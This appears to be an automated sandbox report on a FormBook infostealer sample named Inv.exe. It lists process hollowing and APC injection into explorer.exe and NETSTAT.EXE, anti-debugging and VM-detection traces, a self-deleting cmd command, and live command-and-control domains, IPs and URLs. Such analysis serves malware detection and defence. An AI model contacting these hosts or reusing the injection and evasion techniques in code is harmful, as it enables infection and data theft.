Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h] 4_2_02E399BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3C182 mov eax, dword ptr fs:[00000030h] 4_2_02E3C182
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A185 mov eax, dword ptr fs:[00000030h] 4_2_02E4A185
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42990 mov eax, dword ptr fs:[00000030h] 4_2_02E42990
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C962 mov eax, dword ptr fs:[00000030h] 4_2_02E1C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h] 4_2_02E1B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h] 4_2_02E1B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h] 4_2_02E3B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h] 4_2_02E3B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E34120 mov ecx, dword ptr fs:[00000030h] 4_2_02E34120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h] 4_2_02E4513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h] 4_2_02E4513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h] 4_2_02E19100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h] 4_2_02E19100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h] 4_2_02E19100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E276E2 mov eax, dword ptr fs:[00000030h] 4_2_02E276E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E416E0 mov ecx, dword ptr fs:[00000030h] 4_2_02E416E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E58EC7 mov eax, dword ptr fs:[00000030h] 4_2_02E58EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E436CC mov eax, dword ptr fs:[00000030h] 4_2_02E436CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFEC0 mov eax, dword ptr fs:[00000030h] 4_2_02ECFEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8ED6 mov eax, dword ptr fs:[00000030h] 4_2_02EE8ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h] 4_2_02EE0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E946A7 mov eax, dword ptr fs:[00000030h] 4_2_02E946A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAFE87 mov eax, dword ptr fs:[00000030h] 4_2_02EAFE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2766D mov eax, dword ptr fs:[00000030h] 4_2_02E2766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h] 4_2_02E3AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h] 4_2_02E27E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h] 4_2_02EDAE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h] 4_2_02EDAE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1E620 mov eax, dword ptr fs:[00000030h] 4_2_02E1E620
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECFE3F mov eax, dword ptr fs:[00000030h] 4_2_02ECFE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h] 4_2_02E1C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h] 4_2_02E1C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h] 4_2_02E1C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h] 4_2_02E48E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h] 4_2_02ED1608
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h] 4_2_02E4A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h] 4_2_02E4A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h] 4_2_02E537F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h] 4_2_02E28794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h] 4_2_02E97794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h] 4_2_02E97794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h] 4_2_02E97794
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h] 4_2_02E2FF60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h] 4_2_02EE8F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h] 4_2_02E2EF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h] 4_2_02E14F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h] 4_2_02E14F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h] 4_2_02E4E730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h] 4_2_02EE070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h] 4_2_02EE070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h] 4_2_02E4A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h] 4_2_02E4A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h] 4_2_02E3F716
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h] 4_2_02EAFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h] 4_2_02EAFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h] 4_2_02ED14FB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h] 4_2_02E96CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h] 4_2_02E96CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h] 4_2_02E96CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h] 4_2_02EE8CD6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h] 4_2_02E2849B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h] 4_2_02E3746D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h] 4_2_02E4A44B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h] 4_2_02EAC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h] 4_2_02EAC450
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h] 4_2_02E4BC2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h] 4_2_02EE740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h] 4_2_02EE740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h] 4_2_02EE740D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h] 4_2_02E96C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h] 4_2_02E96C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h] 4_2_02E96C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h] 4_2_02E96C0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h] 4_2_02ED1C06
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h] 4_2_02E2D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h] 4_2_02E2D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h] 4_2_02EDFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h] 4_2_02EDFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h] 4_2_02EDFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h] 4_2_02EDFDE2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EC8DF1 mov eax, dword ptr fs:[00000030h] 4_2_02EC8DF1
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01236B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc, 0_2_01236B80
Enables debug privileges
Source: C:\Users\user\Desktop\Inv.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0123C0A3
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123C080 SetUnhandledExceptionFilter, 0_2_0123C080
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123C0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0123C0A3
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0123C080 SetUnhandledExceptionFilter, 1_2_0123C080

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 172.96.186.206 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Users\user\Desktop\Inv.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Inv.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Inv.exe Thread register set: target process: 3424 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3424 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Inv.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Inv.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 3F0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Inv.exe Process created: C:\Users\user\Desktop\Inv.exe 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inv.exe' Jump to behavior
Source: explorer.exe, 00000002.00000000.675251989.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000002.1046948722.0000000001080000.00000002.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047969407.0000000004280000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.690752068.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_0123D7B7 cpuid 0_2_0123D7B7
Source: C:\Users\user\Desktop\Inv.exe Code function: 0_2_01238431 GetLocalTime, 0_2_01238431

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339347 Sample: Inv.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 www.hwcailing.com 2->36 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 5 other signatures 2->46 11 Inv.exe 2->11         started        signatures3 process4 signatures5 54 Maps a DLL or memory area into another process 11->54 56 Tries to detect virtualization through RDTSC time measurements 11->56 14 Inv.exe 11->14         started        process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.achonabu.com 172.96.186.206, 49767, 80 SINGLEHOP-LLCUS Canada 17->30 32 nationshiphop.com 34.102.136.180, 49759, 49769, 80 GOOGLEUS United States 17->32 34 7 other IPs or domains 17->34 38 System process connects to network (likely due to code injection or exploit) 17->38 21 NETSTAT.EXE 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217
 unknown United States
22612 NAMECHEAP-NETUS false
34.102.136.180
 unknown United States
15169 GOOGLEUS true
172.96.186.206
 unknown Canada
32475 SINGLEHOP-LLCUS true

Contacted Domains

Name IP Active
parkingpage.namecheap.com 198.54.117.217 true
www.hwcailing.com 107.160.136.152 true
millcityloam.com 34.102.136.180 true
www.achonabu.com 172.96.186.206 true
nationshiphop.com 34.102.136.180 true
www.zhaowulu.com unknown unknown
www.millcityloam.com unknown unknown
www.nationshiphop.com unknown unknown
www.a-zsolutionsllc.com unknown unknown
www.jacmkt.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.a-zsolutionsllc.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p true
  • Avira URL Cloud: safe
 unknown
http://www.nationshiphop.com/hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP true
  • Avira URL Cloud: safe
 unknown
http://www.millcityloam.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 true
  • Avira URL Cloud: safe
 unknown
http://www.achonabu.com/hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer true
  • Avira URL Cloud: safe
 unknown